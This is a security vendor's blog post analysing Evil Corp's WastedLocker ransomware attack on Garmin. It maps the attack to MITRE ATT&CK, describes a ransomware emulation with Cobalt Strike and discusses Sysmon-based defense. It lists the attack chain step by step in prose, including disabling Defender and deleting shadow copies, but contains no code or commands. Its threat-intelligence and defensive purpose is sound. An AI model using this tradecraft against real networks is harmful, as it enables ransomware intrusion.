#ThreatThursday - Evil Corp

Garmin users noticed their devices were not working on July 22, 2020, upon visiting the Garmin website, the below image was shown. It would not be until a week later that most Garmin services were operational again. As more information was made public, we found out the attack was attributed to a threat group known as Evil Corp and they leveraged a fairly new ransomware called WastedLocker. This blog post will dive deeper into the Garmin attack, extract TTPs from Cyber Threat Intelligence, create a MITRE ATT&CK Navigator Layer and adversary emulation plan, emulate the attack with Cobalt Strike (like Evil Corp used) and then drop a synthetic WastedLocker built with SCYTHE, and discuss how to defend against ransomware attacks with Olaf Hartong. This blog post is a summary of the DEF CON Red Team Village talk, slides available here and the video of the presentation is below.

Cyber Threat Intelligence

News of the Garmin attack started coming in on July 22, 2020. Eventually we learned all Garmin services were down for about a week:

‍

We found, through Cyber Threat Intelligence, the group responsible for the attack is Evil Corp and they used a ransomware called WastedLocker. This group is not documented in the MITRE ATT&CK site so we had to review the below Cyber Threat Intelligence, extract the TTPs, and map it to MITRE ATT&CK:

• https://techcrunch.com/2020/07/25/garmin-outage-ransomware-sources/  
• https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/ 
• https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us 
• https://blog.malwarebytes.com/threat-spotlight/2020/07/threat-spotlight-wastedlocker-customized-ransomware/ 
  

Evil Corp, as a threat group, is more sophisticated than the standard ransomware attack in that they manually interact with the target, move laterally through a number of systems, and then drop the ransomware. In this case, they dropped WastedLocker. At a high level, this is how the attack works:

• SocGholish is delivered to the victim in a zipped file via compromised legitimate websites
• Zip file with malicious JavaScript, masquerading as a browser update 
• A second JavaScript file profiles the computer and uses PowerShell to download additional discovery related PowerShell scripts
• Once the attackers gain network access, they use Cobalt Strike commodity malware with living-off-the-land tools to steal credentials, escalate privileges, and move across the network to deploy WastedLocker on multiple computers
• PowerShell is used to download and execute a loader from a domain publicly reported as being used to deliver Cobalt Strike as part of WastedLocker attacks
• An injected payload, known as Cobalt Strike Beacon, is used to execute commands, inject other processes, elevate current processes or impersonate other processes, and upload and download files
• Privilege escalation is performed using a publicly documented technique involving the Software Licensing User Interface tool, a command line utility responsible for activating and updating the Windows operating system
• The attackers use the Windows Management Instrumentation Command Line Utility to execute commands on remote computers, such as adding a new user or execute additional downloaded PowerShell scripts
• The attackers launch a legitimate command line tool for managing Windows Defender to disable scanning of all downloaded files and attachments, remove all installed definitions, and, in some cases, disable real-time monitoring
• Windows Sysinternals tool PsExec is used to launch the WastedLocker ransomware, which then begins encrypting data and deleting shadow volumes
  

Here is a screenshot of what the end user would see:

While the Cyber Threat Intelligence by NCC Group and Symantec has good detail, it is not mapped to MITRE ATT&CK so we did the mapping using ATT&CK Navigator and shared the JSON in the SCYTHE Community Threats Github. Here is a direct link to the Navigator Layer show below:

Adversary Emulation Plan

Is emulating ransomware even possible? Of course it is! The secret is to not encrypt or destroy production data. Instead create new files before emulating typical ransomware steps of encrypting, exfiltrating, and obtaining a ransom note. This method ensures no data is ever at risk of being encrypted, destroyed, or leaked.

First, we start by creating by first building a threat profile for Evil Corp and WastedLocker:

‍
Given Evil Corp used Cobalt Strike for manual, lateral movement, we demo how to get a Cobalt Strike Beacon using PowerShell, just as Evil Corp did. Then we use Cobalt Strike to drop the WastedLocker ransomware we created with SCYTHE. The synthetic malware is available on our Community Threats Github for Evil Corp and was created with the below steps:

Defend against WastedLocker

We had the pleasure of sitting down with industry thought leader and just awarded Microsoft MVP, Olaf Hartong, to discuss how to defend against ransomware attacks. Given there are many strains of ransomware in the wild, it is important to focus on the behaviors that ransomware has shown in the past and continue to monitor as these criminal gangs evolve. 

Olaf gives us an introduction to Sysmon, a Windows system service and device driver that monitors and logs system activity to the Windows event log. It provides detailed information about process creations, network connections, and changes to file creation time. By collecting the events it generates using Windows Event Collection or SIEM agents and subsequently analyzing them, you can identify malicious or anomalous activity and understand how intruders and malware operate on your network.

Conclusion

Ransomware is evolving and getting more sophisticated. Evil Corp uses a number of tools to gain initial access, manually move laterally around the target environment, and then drop the ransomware. In this post, we consumed the Cyber Threat Intelligence as it came out, extracts TTPs, mapped to MITRE ATT&CK and created a Navigator Layer, created an adversary emulation plan and shared it on our GitHub, demoed the emulation, and discussed defending against ransomware with Olag Hartong. We hope you enjoyed this blog post that is a summary of the DEF CON Red Team Village talk, slides available here.

This Threat Thursday post discusses active research by SCYTHE and other cited third parties into an ongoing threat. The information in this post should be considered preliminary and may be updated as research continues. This information is provided “as-is” without any warranty or condition of any kind, either express or implied.

About SCYTHE

SCYTHE provides an advanced attack emulation platform for the enterprise and cybersecurity consulting market. The SCYTHE platform enables Red, Blue, and Purple teams to build and emulate real-world adversarial campaigns in a matter of minutes. Customers are in turn enabled to validate the risk posture and exposure of their business and employees and the performance of enterprise security teams and existing security solutions. Based in Arlington, VA, the company is privately held and is funded by Gula Tech Adventures, Paladin Capital, Evolution Equity, and private industry investors. For more information email info@scythe.io, visit https://scythe.io, or follow on Twitter @scythe_io.